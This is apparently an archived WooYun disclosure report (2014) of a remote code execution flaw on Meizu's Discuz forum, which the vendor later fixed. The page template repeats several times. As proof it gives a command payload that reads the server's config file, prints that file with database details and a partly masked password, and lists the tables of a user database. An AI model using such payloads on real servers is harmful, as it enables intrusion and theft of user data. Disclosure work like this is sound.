魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080884

漏洞标题：魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

漏洞作者：猪猪侠

提交时间：2014-10-26 18:05

修复时间：2014-12-01 10:06

公开时间：2014-12-01 10:06

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-26：细节已通知厂商并且等待厂商处理中
2014-10-26：厂商已经确认，细节仅向厂商公开
2014-11-05：细节向核心白帽子及相关领域专家公开
2014-11-15：细节向普通白帽子公开
2014-11-25：细节向实习白帽子公开
2014-12-01：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

魅族科技某分站远程代码执行漏洞(千万用户信息受影响)

详细说明：

影响网站：
http://forum.meizu.com/
Disucz ucenter 用户将近1000万

mask 区域

*****^^^*****
1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt

漏洞证明：

cmd=echo readfile('./config.inc.php');

<?php
//UTF8转码
/*
	[Discuz!] (C)2001-2006 Comsenz Inc.
	This is NOT a freeware, use is subject to license terms
	$RCSfile: config5.inc.php,v $
	$Revision: 1.9 $
	$Date: 2007/01/26 01:11:32 $ 
*/
// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
	$dbhost = '192.168.**.**';			// 数据库服务器
	$dbuser = 'meizu_**bbs';			// 数据库用户名
	$dbpw = 'wdw5NR*****aAhW';				// 数据库密码
	$dbname = 'meizu_enbbs';			// 数据库名
	$pconnect = 0;				// 数据库持久连接 0=关闭, 1=打开
// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认
	$cookiepre = 'dZJ_';			// cookie 前缀
	$cookiedomain = ''; 			// cookie 作用域
	$cookiepath = '/';			// cookie 作用路径
// [CH] 论坛投入使用后不能修改的变量
	$tablepre = 'cdb_';   			// 表名前缀, 同一数据库安装多个论坛请修改此处
// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用
	$database = 'mysql';			// 论坛数据库类型，请勿修改
	$dbcharset = '';			// MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定
	$charset = 'utf-8';			// 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
	$headercharset = 0;			// 强制论坛页面使用默认字符集，可避免部分服务器空间页面出现乱码，一般无需开启。 0=关闭 1= 开启
	$tplrefresh = 1;			// 论坛风格模板自动刷新开关 0=关闭, 1=打开。
	
// [CH] 论坛安全设置, 调整以下设置，可以增强论坛的安全性能和防御性能
	$adminemail = 'bbs@meizu.com';		// 系统管理员 Email

[SHOW TABLES FROM `meizu_user`]
--------------------	-	
Tables_in_meizu_user	|	
--------------------	-	
TMP_VCH_02bea2a76c1f4f2491ae58252cbcfc71875	|	
TMP_VCH_0952588bd0904304a66e5db830d70853224	|	
TMP_VCH_131a1deb65bf4ab0b75dff6fa00c71c6923	|	
TMP_VCH_2ee3064b952241e694fcc5704dd37c286	|	
TMP_VCH_31ef36f285804af7a48bb939d7cc93a4544	|	
TMP_VCH_326901080e2d4cf8a85586e29f41f18065	|	
TMP_VCH_3cbe635e43be490296dbdc769d9e6774657	|	
TMP_VCH_3fcd7a5ee099423ba2383f459c8e0e98744	|	
TMP_VCH_530da630629843f6acd070b435bc7045572	|	
TMP_VCH_6fb938aba3ac4d34a3b156eefd6e7805262	|	
TMP_VCH_8a33e169514241ed9c8abbd76733b55a187	|	
TMP_VCH_8aae9628d37f44c785090f0a67e3a16f692	|	
TMP_VCH_9077238e556a4a068d54a5aee0b5113b846	|	
TMP_VCH_a28ce46669ef4c89b0eecd23c0cca09d778	|	
TMP_VCH_a58b7ec518b443048d0ffce7efdc3e0b311	|	
TMP_VCH_b84f960d9531447196fae440b2207791691	|	
TMP_VCH_bdfb1492eba54967a1c5ef6e09a44424884	|	
TMP_VCH_d02e1d2e1f8c4c819931ce72a4d3c571927	|	
TMP_VCH_d7b21c017ff4415cb8c584d524cf3498975	|	
T_APP_PRODUCT_ORDER	|	
T_AUTH_GRANT	|	
T_AUTH_OAUTH	|	
T_AUTH_RESOURCE	|	
T_AUTH_ROLE	|	
T_AUTH_ROLE_RESOURCE	|	
T_AUTH_USER	|	
T_BBS_DONATE_PERSON	|	
T_BBS_TITLE_INFO	|	
T_BS_BASEDATA	|	
T_BS_BASEDATA_LANG	|	
T_BS_BASEDATA_TYPE	|	
T_BS_GENERATECODE	|	
T_BS_GENERATECODE_LAST	|	
T_BS_IDENTITY	|	
T_BS_LOG	|	
T_BS_LOGINFAIL	|	
T_BS_LOGIN_URL	|	
T_BS_PARAMETER	|	
T_BS_PUSH_ROUTER	|	
T_BS_PWDKEY	|	
T_BS_REFERBD	|	
T_FNBL_CATEGORY	|	
T_UC_ACCOUNT	|	
T_UC_ACCOUNT_bak	|	
T_UC_BAL_0424	|	
T_UC_BAL_CHANGE_0424	|	
T_UC_BILL	|	
T_UC_BILL_LOSTDATA_0424	|	
T_UC_CHECKACCOUT_0424	|	
T_UC_DONATE_0424	|	
T_UC_LOGIN_VALIDCODE	|	
T_UC_MEMBERS_ACTIVE	|	
T_UC_MEMBERS_EXT	|	
T_UC_MEMBERS_MODIFY_ACTIVED_EMAIL	|	
T_UC_MEMBERS_VERIFICATION_CODE	|	
T_UC_MEMBER_DONATE	|	
T_UC_MEMBER_SN	|	
T_UC_MEMBER_SN_TMP	|	
T_UC_PAYMENT	|	
T_UC_PAYMENT_0424	|	
T_UC_PAYMENT_APPEAL_0424	|	
T_UC_PAYMENT_TEMP_0424	|	
T_UC_PAYMENT_tmp	|	
T_UC_TICKET	|	
T_UC_USER_BAL	|	
T_UC_VOUCHER_ENTRY_LOSTDATA	|	
T_UC_VOUCHER_ENTRY_tmp	|	
admin	|	
all_sn_1_tmp	|	
all_sn_2_tmp	|	
exists_sn_tmp	|	
exists_sn_tmp2	|	
imsi_card	|	
meizu_device	|	
no_exists_sn_tmp	|	
no_exists_sn_tmp2	|	
not_update_id_tmp	|	
online_meizu_device	|	
online_meizu_device_20140630_bak	|	
online_meizu_device_20140710_bak	|	
online_meizu_device_BAK_0711	|	
to_delete_id_tmp	|	
uc_admins	|	
uc_applications	|	
uc_badwords	|	
uc_create_members	|	
uc_domains	|	
uc_events	|	
uc_failedlogins	|	
uc_feeds	|	
uc_friends	|	
uc_mailqueue	|	
uc_memberfields	|	
uc_members	|	
uc_mergemembers	|	
uc_newpm	|	
uc_notelist	|	
uc_pm_indexes	|	
uc_pm_lists	|	
uc_pm_members	|	
uc_pm_messages_0	|	
uc_pm_messages_1	|	
uc_pm_messages_2	|	
uc_pm_messages_3	|	
uc_pm_messages_4	|	
uc_pm_messages_5	|	
uc_pm_messages_6	|	
uc_pm_messages_7	|	
uc_pm_messages_8	|	
uc_pm_messages_9	|	
uc_pms	|	
uc_protectedmembers	|	
uc_settings	|	
uc_sqlcache	|	
uc_tags	|	
uc_user_answer	|	
uc_user_setting	|	
uc_vars	|	
user_nickname_locus	|

修复方案：

更改php.ini
设置: request_order为GPC

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-10-26 18:35

厂商回复：

厂商正在处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080884

漏洞标题：魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

相关厂商：魅族科技

漏洞作者：猪猪侠

提交时间：2014-10-26 18:05

修复时间：2014-12-01 10:06

公开时间：2014-12-01 10:06

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080884

漏洞标题：魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

相关厂商：魅族科技

漏洞作者： 猪猪侠

提交时间：2014-10-26 18:05

修复时间：2014-12-01 10:06

公开时间：2014-12-01 10:06

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-080884"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云